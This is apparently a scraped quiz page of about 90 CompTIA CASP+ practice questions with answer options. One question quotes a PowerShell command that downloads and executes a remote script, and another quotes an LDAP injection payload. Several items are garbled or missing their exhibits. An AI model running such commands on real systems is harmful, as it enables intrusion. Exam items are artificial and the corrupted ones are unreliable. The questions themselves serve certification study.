option
Questions
ayuda
daypo
CREATE TEST
search.php

ERASED TEST, YOU MAY BE INTERESTED ON Casp+ B

COMMENTS STATISTICS RECORDS
TAKE THE TEST
Title of test:
Casp+ B

Description:
CompTIA CASP+

Author:
TheShed
Other tests from this author

Creation Date: 17/09/2024

Category: Computers

Number of questions: 90
Share the Test:
New CommentNuevo Comentario
No comments about this test.
Content:
A networking team asked a security administrator to enable Flash on its web browser. The networking team explained that an important legacy embedded system gathers SNMP information from various devices. The system can only be managed through a web browser running Flash. The embedded system will be replaced within the year but is still critical at the moment. Which of the following should the security administrator do to mitigate the risk? Explain to the networking team the reason Flash is no longer available and insist the team move up the timetable for replacement Air gap the legacy system from the network and dedicate a laptop with an end-of-life OS on it to connect to the system via crossover cable for management. Suggest that the networking team contact the original embedded system's vendor to get an update to the system that does not require Flash. Isolate the management interface to a private VLAN where a legacy browser in a VM can be used as needed to manage the system.
Given the following log snippet from a web server: Which of the following BEST describes this type of attack? SQL injection Cross-site scripting Brute-force Cross-site request forgery.
A pharmaceutical company recently experienced a security breach within its customer-facing web portal. The attackers performed a SQL injection attack and exported tables from the company's managed database, exposing customer information. The company hosts the application with a CSP utilizing the IaaS model. Which of the following parties is ultimately responsible for the breach? The pharmaceutical company The cloud software provider The web portal software vendor The database software vendor.
A host on a company's network has been infected by a worm that appears to be spreading via SMB. A security analyst has been tasked with containing the incident while also maintaining evidence for a subsequent investigation and malware analysis. Which of the following steps would be best to perform FIRST? Turn off the infected host immediately Run a full anti-malware scan on the infected host. Modify the smb.conf file of the host to prevent outgoing SMB connections. Isolate the infected host from the network by removing all network connections.
A company's product site recently had failed API calls, resulting in customers being unable to check out and purchase products. This type of failure could lead to the loss of customers and damage to the company's reputation in the market. Which of the following should the company implement to address the risk of system unavailability? User and entity behavior analytics Redundant reporting systems A self-healing system Application controls.
Which of the following represents the MOST significant benefit of implementing a passwordless authentication solution? Biometric authenticators are immutable The likelihood of account compromise is reduced. Zero trust is achieved. Privacy risks are minimized.
A review of the past year's attack patterns shows that attackers stopped reconnaissance after finding a susceptible system to compromise. The company would like to find a way to use this information to protect the environment while still gaining valuable attack information. Which of the following would be BEST for the company to implement? A WAF An IDS A SIEM A honeypot.
Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP 80,443 Add the following to Firewall_A: 15 PERMIT FROM 192.168.1.0/24 TO 0.0.0.0 TCP 80,443 Add the following to Firewall_A: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0/0 TCP/UDP 0-65535 Add the following to Firewall_B: 15 PERMIT FROM 0.0.0.0/0 TO 10.0.0.0/16 TCP/UDP 0-65535 Add the following to Firewall_B: 15 PERMIT FROM 10.0.0.0/16 TO 0.0.0.0 TCP/UDP 0-65535 Add the following to Firewall_B: 15 PERMIT FROM 192.168.1.0/24 TO 10.0.2.10/32 TCP 80,443.
As part of the customer registration process to access a new bank account, customers are required to upload a number of documents, including their passports and driver's licenses. The process also requires customers to take a current photo of themselves to be compared against provided documentation. Which of the following BEST describes this process? Deepfake Know your costumer Identity proofing Passwordless.
A user from the sales department opened a suspicious file attachment. The sales department then contacted the SOC to investigate a number of unresponsive systems, and the team successfully identified the file and the origin of the attack. Which of the following is the NEXT step of the incident response plan? Remediation Containment Response Recovery.
A recent data breach stemmed from unauthorized access to an employee's company account with a cloud-based productivity suite. The attacker exploited excessive permissions granted to a third-party OAuth application to collect sensitive information. Which of the following BEST mitigates inappropriate access and permissions issues? SIEM CASB WAF SOAR.
A security engineer is hardening a company's multihomed SFTP server. When scanning a public-facing network interface, the engineer finds the following ports are open: ✑ 25 ✑ 110 ✑ 137 ✑ 138 ✑ 139 ✑ 445 Internal Windows clients are used to transferring files to the server to stage them for customer download as part of the company's distribution process. Which of the following would be the BEST solution to harden the system? Close ports 110, 138, and 139. Bind ports 22, 25, and 137 to only the internal interface Close ports 25 and 110. Bind ports 137, 138, 139, and 445 to only the internal interface. Close ports 22 and 139. Bind ports 137, 138, and 445 to only the internal interface. Close ports 22, 137, and 138. Bind ports 110 and 445 to only the internal interface.
A recent data breach revealed that a company has a number of files containing customer data across its storage environment. These files are individualized for each employee and are used in tracking various customer orders, inquiries, and issues. The files are not encrypted and can be accessed by anyone. The senior management team would like to address these issues without interrupting existing processes. Which of the following should a security architect recommend? A DLP program to identify which files have customer data and delete them An ERP program to identify which processes need to be tracked A CMDB to report on systems that are not configured to security baselines A CRM application to consolidate the data and provision access based on the process and need.
A security analyst observes the following while looking through network traffic in a company's cloud log: Which of the following steps should the security analyst take FIRST? Quarantine 10.0.5.52 and run a malware scan against the host. Access 10.0.5.52 via EDR and identify processes that have network connections. Isolate 10.0.50.6 via security groups. Investigate web logs on 10.0.50.6 to determine if this is normal traffic.
Which of the following is the MOST important cloud-specific risk from the CSP's viewpoint? Isolation control failure Management plane breach Insecure data deletion Resource exhaustion.
An organization is developing a disaster recovery plan that requires data to be backed up and available at a moment's notice. Which of the following should the organization consider FIRST to address this requirement? Implement a change management plan to ensure systems are using the appropriate versions. Hire additional on-call staff to be deployed if an event occurs. Design an appropriate warm site for business continuity Identify critical business processes and determine associated software and hardware requirements.
Leveraging cryptographic solutions to protect data that is in use ensures the data is encrypted: when it is passed across a local network in memory during processing when it is written to a system's solid-state drive. by an enterprise hardware security module.
A Chief Information Officer (CIO) wants to implement a cloud solution that will satisfy the following requirements: ✑ Support all phases of the SDLC. ✑ Use tailored website portal software. ✑ Allow the company to build and use its own gateway software. ✑ Utilize its own data management platform. ✑ Continue using agent-based security tools. Which of the following cloud-computing models should the CIO implement? SaaS PaaS MaaS IaaS.
A security analyst detected a malicious PowerShell attack on a single server. The malware used the Invoke-Expression function to execute an external malicious script. The security analyst scanned the disk with an antivirus application and did not find any IOCs. The security analyst now needs to deploy a protection solution against this type of malware. Which of the following BEST describes the type of malware the solution should protect against? Worm Logic bomb Fileless Rootkit.
A development team created a mobile application that contacts a company's back-end APIs housed in a PaaS environment. The APIs have been experiencing high processor utilization due to scraping activities. The security engineer needs to recommend a solution that will prevent and remedy the behavior. Which of the following would BEST safeguard the APIs? (Choose two.) Bot protection OAuth 2.0 Input validation Autoscaling endpoints Rate limiting CSRF protection.
An organization's existing infrastructure includes site-to-site VPNs between datacenters. In the past year, a sophisticated attacker exploited a zero-day vulnerability on the VPN concentrator. Consequently, the Chief Information Security Officer (CISO) is making infrastructure changes to mitigate the risk of service loss should another zero-day exploit be used against the VPN solution. Which of the following designs would be BEST for the CISO to use? Adding a second redundant layer of alternate vendor VPN concentrators Using Base64 encoding within the existing site-to-site VPN connections Distributing security resources across VPN sites Implementing IDS services with each VPN concentrator Transitioning to a container-based architecture for site-based services.
A local government that is investigating a data exfiltration claim was asked to review the fingerprint of the malicious user's actions. An investigator took a forensic image of the VM and downloaded the image to a secured USB drive to share with the government. Which of the following should be taken into consideration during the process of releasing the drive to the government? Encryption in transit Legal issues Chain of custody Order of volatility Key exchange.
A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell `IEX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois` Which of the following security controls would have alerted and prevented the next phase of the attack? Antivirus and UEBA Reverse proxy and sandbox EDR and application approved list Forward proxy and MFA.
As part of its risk strategy, a company is considering buying insurance for cybersecurity incidents. Which of the following BEST describes this kind of risk response? Risk rejection Risk mitigation Risk transference Risk avoidance.
A DevOps team has deployed databases, event-driven services, and an API gateway as PaaS solution that will support a new billing system. Which of the following security responsibilities will the DevOps team need to perform? Securely configure the authentication mechanisms. Patch the infrastructure at the operating system Execute port scanning against the services Upgrade the service as part of life-cycle management.
A company's Chief Information Officer wants to implement IDS software onto the current system's architecture to provide an additional layer of security. The software must be able to monitor system activity, provide information on attempted attacks, and provide analysis of malicious activities to determine the processes or users involved. Which of the following would provide this information? HIPS UEBA HIDS NIDS.
The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight. Which of the following testing methods would be BEST for the engineer to utilize in this situation? Software composition analysis Code obfuscation Static analysis Dynamic analysis.
A forensic investigator would use the foremost command for: cloning disks analyzing network-captured packets. recovering lost files. extracting features such as email addresses.
A software company is developing an application in which data must be encrypted with a cipher that requires the following: ✑ Initialization vector ✑ Low latency ✑ Suitable for streaming Which of the following ciphers should the company use? Cipher feedback Cipher block chaining message authentication code Cipher block chaining Electronic codebook.
An organization that provides a SaaS solution recently experienced an incident involving customer data loss. The system has a level of selfhealing that includes monitoring performance and available resources. When the system detects an issue, the self-healing process is supposed to restart parts of the software. During the incident, when the self-healing system attempted to restart the services, available disk space on the data drive to restart all the services was inadequate. The self-healing system did not detect that some services did not fully restart and declared the system as fully operational. Which of the following BEST describes the reason why the silent failure occurred? The system logs rotated prematurely The disk utilization alarms are higher than what the service restarts require The number of nodes in the self-healing cluster was healthy Conditional checks prior to the service restart succeeded.
A security consultant needs to set up wireless security for a small office that does not have Active Directory. Despite the lack of central account management, the office manager wants to ensure a high level of defense to prevent brute-force attacks against wireless authentication. Which of the following technologies would BEST meet this need? Faraday cage WPA2 PSK WPA3 SAE WEP 128 bit.
An attack team performed a penetration test on a new smart card system. The team demonstrated that by subjecting the smart card to high temperatures, the secret key could be revealed. Which of the following side-channel attacks did the team use? Differential power analysis Differential fault analysis Differential temperature analysis Differential timing analysis.
A security compliance requirement states that specific environments that handle sensitive data must be protected by need-to-know restrictions and can only connect to authorized endpoints. The requirement also states that a DLP solution within the environment must be used to control the data from leaving the environment. Which of the following should be implemented for privileged users so they can support the environment from their workstations while remaining compliant? NAC to control authorized endpoints FIM on the servers storing the data A jump box in the screened subnet A general VPN solution to the primary network.
A networking team was asked to provide secure remote access to all company employees. The team decided to use client-to-site VPN as a solution. During a discussion, the Chief Information Security Officer raised a security concern and asked the networking team to route the Internet traffic of remote users through the main office infrastructure. Doing this would prevent remote users from accessing the Internet through their local networks while connected to the VPN. Which of the following solutions does this describe? Full tunneling Asymmetric routing SSH tunneling Split tunneling.
A security analyst discovered that the company's WAF was not properly configured. The main web server was breached, and the following payload was found in one of the malicious requests: (&(objectClass=*)(objectClass=*))(&(objectClass=void)(type=admin)) Which of the following would BEST mitigate this vulnerability? Network intrusion prevention Data encoding Input validation CAPTCHA.
A security consultant needs to protect a network of electrical relays that are used for monitoring and controlling the energy used in a manufacturing facility. Which of the following systems should the consultant review before making a recommendation? CAN ASIC FPGA SCADA.
Company A acquired Company ׀‘. During an audit, a security engineer found Company B's environment was inadequately patched. In response, Company A placed a firewall between the two environments until Company B's infrastructure could be integrated into Company A's security program. Which of the following risk-handling techniques was used? Accept Avoid Transfer Mitigate.
An organization is prioritizing efforts to remediate or mitigate risks identified during the latest assessment. For one of the risks, a full remediation was not possible, but the organization was able to successfully apply mitigations to reduce the likelihood of impact. Which of the following should the organization perform NEXT? Assess the residual risk. Update the organization's threat model. Move to the next risk in the register. Recalculate the magnitude of impact.
A software house is developing a new application. The application has the following requirements: ✑ Reduce the number of credential requests as much as possible ✑ Integrate with social networks ✑ Authenticate users Which of the following is the BEST federation method to use for the application? WS-Federation OpenID OAuth SAML.
A company is looking for a solution to hide data stored in databases. The solution must meet the following requirements: ✑ Be efficient at protecting the production environment ✑ Not require any change to the application ✑ Act at the presentation layer Which of the following techniques should be used? Masking Tokenization Algorithmic Random substitution.
A forensic expert working on a fraud investigation for a US-based company collected a few disk images as evidence. Which of the following offers an authoritative decision about whether the evidence was obtained legally? Lawyers Court Upper management team Police.
Technicians have determined that the current server hardware is outdated, so they have decided to throw it out. Prior to disposal, which of the following is the BEST method to use to ensure no data remnants can be recovered? Drive wiping Degaussing Purging Physical destruction.
A penetration tester obtained root access on a Windows server and, according to the rules of engagement, is permitted to perform postexploitation for persistence. Which of the following techniques would BEST support this? Configuring systemd services to run automatically at startup Creating a backdoor Exploiting an arbitrary code execution exploit Moving laterally to a more authoritative server/service.
A security architect for a large, multinational manufacturer needs to design and implement a security solution to monitor traffic. When designing the solution, which of the following threats should the security architect focus on to prevent attacks against the ׀׀¢ network? Packets that are the wrong size or length Use of any non-DNP3 communication on a DNP3 port Multiple solicited responses over time Application of an unsupported encryption algorithm.
A security administrator configured the account policies per security implementation guidelines. However, the accounts still appear to be susceptible to brute-force attacks. The following settings meet the existing compliance guidelines: ✑ Must have a minimum of 15 characters ✑ Must use one number ✑ Must use one capital letter ✑ Must not be one of the last 12 passwords used Which of the following policies should be added to provide additional security? Shared accounts Password complexity Account lockout Password history Time-based logins.
A cybersecurity analyst discovered a private key that could have been exposed. Which of the following is the BEST way for the analyst to determine if the key has been compromised? HSTS CRL CSRs OCSP.
Which of the following technologies allows CSPs to add encryption across multiple data storages? Symmetric encryption Homomorphic encryption Data dispersion Bit splitting.
A vulnerability scanner detected an obsolete version of an open-source file-sharing application on one of a company's Linux servers. While the software version is no longer supported by the OSS community, the company's Linux vendor backported fixes, applied them for all current vulnerabilities, and agrees to support the software in the future. Based on this agreement, this finding is BEST categorized as a: true positive true negative false positive false negative. .
A company's Chief Information Security Officer is concerned that the company's proposed move to the cloud could lead to a lack of visibility into network traffic flow logs within the VPC. Which of the following compensating controls would be BEST to implement in this situation? EDR SIEM HIDS UEBA.
A security team received a regulatory notice asking for information regarding collusion and pricing from staff members who are no longer with the organization. The legal department - provided the security team with a list of search terms to investigate. This is an example of: due diligence e-discovery due care. legal hold.
Which of the following protocols is a low power, low data rate that allows for the creation of PAN networks? Zigbee CAN DNP3 Modbus.
An organization's assessment of a third-party, non-critical vendor reveals that the vendor does not have cybersecurity insurance and IT staff turnover is high. The organization uses the vendor to move customer office equipment from one service location to another. The vendor acquires customer data and access to the business via an API. Given this information, which of the following is a noted risk? Feature delay due to extended software development cycles Financial liability from a vendor data breach Technical impact to the API configuration The possibility of the vendor's business ceasing operations.
A company wants to quantify and communicate the effectiveness of its security controls but must establish measures. Which of the following is MOST likely to be included in an effective assessment roadmap for these controls? Create a change management process Establish key performance indicators Create an integrated master schedule. Develop a communication plan. Perform a security control assessment.
A bank is working with a security architect to find the BEST solution to detect database management system compromises. The solution should meet the following requirements: ✑ Work at the application layer ✑ Send alerts on attacks from both privileged and malicious users ✑ Have a very low false positive Which of the following should the architect recommend? FIM WAF NIPS DAM UTM.
A business wants to migrate its workloads from an exclusively on-premises IT infrastructure to the cloud but cannot implement all the required controls. Which of the following BEST describes the risk associated with this implementation? Loss of governance Vendor lockout Compliance risk Vendor lock-in.
A security architect needs to implement a CASB solution for an organization with a highly distributed remote workforce. One of the requirements for the implementation includes the capability to discover SaaS applications and block access to those that are unapproved or identified as risky. Which of the following would BEST achieve this objective? Deploy endpoint agents that monitor local web traffic to enforce DLP and encryption policies. Implement cloud infrastructure to proxy all user web traffic to enforce DLP and encryption policies Implement cloud infrastructure to proxy all user web traffic and control access according to centralized policy Deploy endpoint agents that monitor local web traffic and control access according to centralized policy.
During a phishing exercise, a few privileged users ranked high on the failure list. The enterprise would like to ensure that privileged users have an extra security- monitoring control in place. Which of the following is the MOST likely solution? A WAF to protect web traffic User and entity behavior analytics Requirements to change the local password A gap analysis.
An analyst is evaluating the security of a web application that does not hold sensitive or financial data. The application requires users to have a minimum password length of 12 characters. One of the characters must be capitalized, and one must be a number. To reset the password, the user is asked to provide the birthplace, birthdate, and mother's maiden name. When all of these are entered correctly, a new password is emailed to the user. Which of the following should concern the analyst the MOST? The security answers may be determined via online reconnaissance The password is too long, which may encourage users to write the password down The password should include a special character The minimum password length is too short.
In a cloud environment, the provider offers relief to an organization's teams by sharing in many of the operational duties. In a shared responsibility model, which of the following responsibilities belongs to the provider in a PaaS implementation? Application-specific data assets Application user access management Application-specific logic and code Application/platform software.
An analyst received a list of IOCs from a government agency. The attack has the following characteristics: 1. The attack starts with bulk phishing. 2. If a user clicks on the link, a dropper is downloaded to the computer. 3. Each of the malware samples has unique hashes tied to the user. The analyst needs to identify whether existing endpoint controls are effective. Which of the following risk mitigation techniques should the analyst use? Update the incident response plan Blocklist the executable Deploy a honeypot onto the laptops Detonate in a sandbox.
An organization's finance system was recently attacked. A forensic analyst is reviewing the contents of the compromised files for credit card data. Which of the following commands should the analyst run to BEST determine whether financial data was lost? grep ג€"v '^4 [09"€ג} [12?) {:]9"€ג0}[3? ({$ 'file grep '^4 [09"€ג}[12?){:]9"€ג0}[3?({$ 'file grep '^6(?:011|5[09"€ג}[2] ({9"€ג0} [12 '? {file grep ג€"v '^6(?:011|5[09"€ג}[2]({9"€ג0}[12 '?{file.
An organization requires a contractual document that includes: ✑ An overview of what is covered ✑ Goals and objectives ✑ Performance metrics for each party ✑ A review of how the agreement is managed by all parties Which of the following BEST describes this type of contractual document? SLA BAA NDA ISA.
A company based in the United States holds insurance details of EU citizens. Which of the following must be adhered to when processing EU citizens' personal, private, and confidential data? The principle of lawful, fair, and transparent processing The right to be forgotten principle of personal data erasure requests The non-repudiation and deniability principle The principle of encryption, obfuscation, and data masking.
A security analyst is evaluating the security of an online customer banking system. The analyst has a 12-character password for the test account. At the login screen, the analyst is asked to enter the third, eighth, and eleventh characters of the password. Which of the following describes why this request is a security concern? (Choose two.) The request is evidence that the password is more open to being captured via a keylogger The request proves that salt has not been added to the password hash, thus making it vulnerable to rainbow tables. The request proves the password is encoded rather than encrypted and thus less secure as it can be easily reversed. The request proves a potential attacker only needs to be able to guess or brute force three characters rather than 12 characters of the password. The request proves the password is stored in a reversible format, making it readable by anyone at the bank who is given access. The request proves the password must be in cleartext during transit, making it open to on-path attacks.
A company launched a new service and created a landing page within its website network for users to access the service. Per company policy, all websites must utilize encryption for any authentication pages. A junior network administrator proceeded to use an outdated procedure to order new certificates. Afterward, customers are reporting the following error when accessing a new web page: NET:ERR_CERT_COMMON_NAME_INVALID. Which of the following BEST describes what the administrator should do NEXT? Request a new certificate with the correct subject alternative name that includes the new websites Request a new certificate with the correct organizational unit for the company's website. Request a new certificate with a stronger encryption strength and the latest cipher suite Request a new certificate with the same information but including the old certificate on the CRL.
A large number of emails have been reported, and a security analyst is reviewing the following information from the emails: As part of the triage process, which of the following is the FIRST step the analyst should take? Block the email address carl.b@comptia1.com, as it is sending spam to subject matter experts Validate the final ג€Receivedג€ header against the DNS entry of the domain Compare the ג€Return-Pathג€ and ג€Receivedג€ fields. Ignore the emails, as SPF validation is successful, and it is a false positive.
Which of the following is the BEST disaster recovery solution when resources are running in a cloud environment? Remote provider BCDR Cloud provider BCDR Alternative provider BCDR Primary provider BCDR.
Enable the X-Forwarded-For header at the load balancer. Install a software-based HIDS on the application servers Install a certificate signed by a trusted CA. Use stored procedures on the database server. Store the value of the $_SERVER['REMOTE_ADDR'] received by the web servers.
Due to internal resource constraints, the management team has asked the principal security architect to recommend a solution that shifts partial responsibility for application-level controls to the cloud provider. In the shared responsibility model, which of the following levels of service meets this requirement? IaaS SaaS FaaS PaaS.
A security analyst needs to recommend a remediation to the following threat: Which of the following actions should the security analyst propose to prevent this successful exploitation? Patch the system. Update the antivirus Install a host-based firewall. Enable TLS 1.2.
An organization requires a legacy system to incorporate reference data into a new system. The organization anticipates the legacy system will remain in operation for the next 18 to 24 months. Additionally, the legacy system has multiple critical vulnerabilities with no patches available to resolve them. Which of the following is the BEST design option to optimize security? Limit access to the system using a jump box. Place the new system and legacy system on separate VLANs Deploy the legacy application on an air-gapped system Implement MFA to access the legacy system.
An attacker infiltrated an electricity-generation site and disabled the safety instrumented system. Ransomware was also deployed on the engineering workstation. The environment has back-to-back firewalls separating the corporate and OT systems. Which of the following is the MOST likely security consequence of this attack? A turbine would overheat and cause physical harm. The engineers would need to go to the historian The SCADA equipment could not be maintained. Data would be exfiltrated through the data diodes.
Which of the following is required for an organization to meet the ISO 27018 standard? All PII must be encrypted All network traffic must be inspected. GDPR equivalent standards must be met COBIT equivalent standards must be met.
A company invested a total of $10 million for a new storage solution installed across five on-site datacenters. Fifty percent of the cost of this investment was for solid-state storage. Due to the high rate of wear on this storage, the company is estimating that 5% will need to be replaced per year. Which of the following is the ALE due to storage replacement? $50,000 $125,000 $250,000 $500,000 $1,000,000.
A security architect was asked to modify an existing internal network design to accommodate the following requirements for RDP: ✑ Enforce MFA for RDP. ✑ Ensure RDP connections are only allowed with secure ciphers. The existing network is extremely complex and not well segmented. Because of these limitations, the company has requested that the connections not be restricted by network-level firewalls or ACLs. Which of the following should the security architect recommend to meet these requirements? Implement a reverse proxy for remote desktop with a secure cipher configuration enforced. Implement a bastion host with a secure cipher configuration enforced Implement a remote desktop gateway server, enforce secure ciphers, and configure to use OTP Implement a GPO that enforces TLS cipher suites and limits remote desktop access to only VPN users.
An organization is deploying a new, online digital bank and needs to ensure availability and performance. The cloud-based architecture is deployed using PaaS and SaaS solutions, and it was designed with the following considerations: ✑ Protection from DoS attacks against its infrastructure and web applications is in place. ✑ Highly available and distributed DNS is implemented. ✑ Static content is cached in the CDN. ✑ A WAF is deployed inline and is in block mode. ✑ Multiple public clouds are utilized in an active-passive architecture. With the above controls in place, the bank is experiencing a slowdown on the unauthenticated payments page. Which of the following is the MOST likely cause? The public cloud provider is applying QoS to the inbound customer traffic. The API gateway endpoints are being directly targeted. The site is experiencing a brute-force credential attack. A DDoS attack is targeted at the CDN.
A healthcare system recently suffered from a ransomware incident. As a result, the board of directors decided to hire a security consultant to improve existing network security. The security consultant found that the healthcare network was completely flat, had no privileged access limits, and had open RDP access to servers with personal health information. As the consultant builds the remediation plan, which of the following solutions would BEST solve these challenges? (Choose three.) SD-WAN PAM Remote access VPN MFA Network segmentation BGP NAC.
A Chief Information Security Officer (CISO) is concerned that a company's current data disposal procedures could result in data remanence. The company uses only SSDs. Which of the following would be the MOST secure way to dispose of the SSDs given the CISO's concern? Degaussing Overwriting Shredding Formatting Incinerating.
The CI/CD pipeline requires code to have close to zero defects and zero vulnerabilities. The current process for any code releases into production uses two-week Agile sprints. Which of the following would BEST meet the requirement? An open-source automation server A static code analyzer Trusted open-source libraries A single code repository for all developers.
A security analyst wants to keep track of all outbound web connections from workstations. The analyst's company uses an on-premises web filtering solution that forwards the outbound traffic to a perimeter firewall. When the security analyst gets the connection events from the firewall, the source IP of the outbound web traffic is the translated IP of the web filtering solution. Considering this scenario involving source NAT, which of the following would be the BEST option to inject in the HTTP header to include the real source IP from workstations? X-Forwarded-Proto X-Forwarded-For Cache-Contro Strict-Transport-Security Content-Security-Policy.
An HVAC contractor requested network connectivity permission to remotely support/troubleshoot equipment issues at a company location. Currently, the company does not have a process that allows vendors remote access to the corporate network. Which of the following solutions represents the BEST course of action to allow the contractor access? Add the vendor's equipment to the existing network. Give the vendor access through the standard corporate VPN. Give the vendor a standard desktop PC to attach the equipment to. Give the vendor access through the standard corporate VPN. Establish a certification process for the vendor. Allow certified vendors access to the VDI to monitor and maintain the HVAC equipment. Create a dedicated segment with no access to the corporate network. Implement dedicated VPN hardware for vendor access.
An attacker infiltrated the code base of a hardware manufacturer and inserted malware before the code was compiled. The malicious code is now running at the hardware level across a number of industries and sectors. Which of the following categories BEST describes this type of vendor risk? SDLC attact Side-load attack Remote code signing Supply chain attack.
A company is adopting a new artificial-intelligence-based analytics SaaS solution. This is the company's first attempt at using a SaaS solution, and a security architect has been asked to determine any future risks. Which of the following would be the GREATEST risk in adopting this solution? The inability to assign access controls to comply with company policy The inability to require the service provider process data in a specific country The inability to obtain company data when migrating to another service The inability to conduct security assessments against a service provider.
A BIA of a popular online retailer identified several mission-essential functions that would take more than seven days to recover in the event of an outage. Which of the following should be considered when setting priorities for the restoration of these functions? Supply chain issues Revenue generation Warm-site operations Scheduled impacts to future projects.
A software development company makes its software version available to customers from a web portal. On several occasions, hackers were able to access the software repository to change the package that is automatically published on the website. Which of the following would be the technique to ensure the software the users download is the official software released by the company? Distribute the software via a third-party repository. Close the web repository and deliver the software via email. Email the software link to all customers Display the SHA checksum on the website.
An organization decided to begin issuing corporate mobile device users microSD HSMs that must be installed in the mobile devices in order to access corporate resources remotely. Which of the following features of these devices MOST likely led to this decision? (Choose two.) Software-backed keystore Embedded cryptoprocessor Hardware-backed public key storage Support for stream ciphers Decentralized key management TPM 2.0 attestation services.
A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program. A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very old and outdated OSs. Which of the following solutions would prevent these vulnerabilities from being introduced into the company's existing infrastructure? Segment the systems to reduce the attack surface if an attack occurs. Migrate the services to new systems with a supported and patched OS. Patch the systems to the latest versions of the existing OSs Install anti-malware, HIPS, and host-based firewalls on each of the systems.
A company was recently infected by malware. During the root cause analysis, the company determined that several users were installing their own applications. To prevent further compromises, the company has decided it will only allow authorized applications to run on its systems. Which of the following should the company implement? Signing Access control HIPS Permit listing.
A security analyst is reviewing the following vulnerability assessment report: Which of the following should be patched FIRST to minimize attacks against Internet-facing hosts? Server 1 Server 2 Server 3 Server 4.
An organization is researching the automation capabilities for systems within an OT network. A security analyst wants to assist with creating secure coding practices and would like to learn about the programming languages used on the PLCs. Which of the following programming languages is the MOST relevant for PLCs? Ladder logic Rust C Python Java.
Report abuse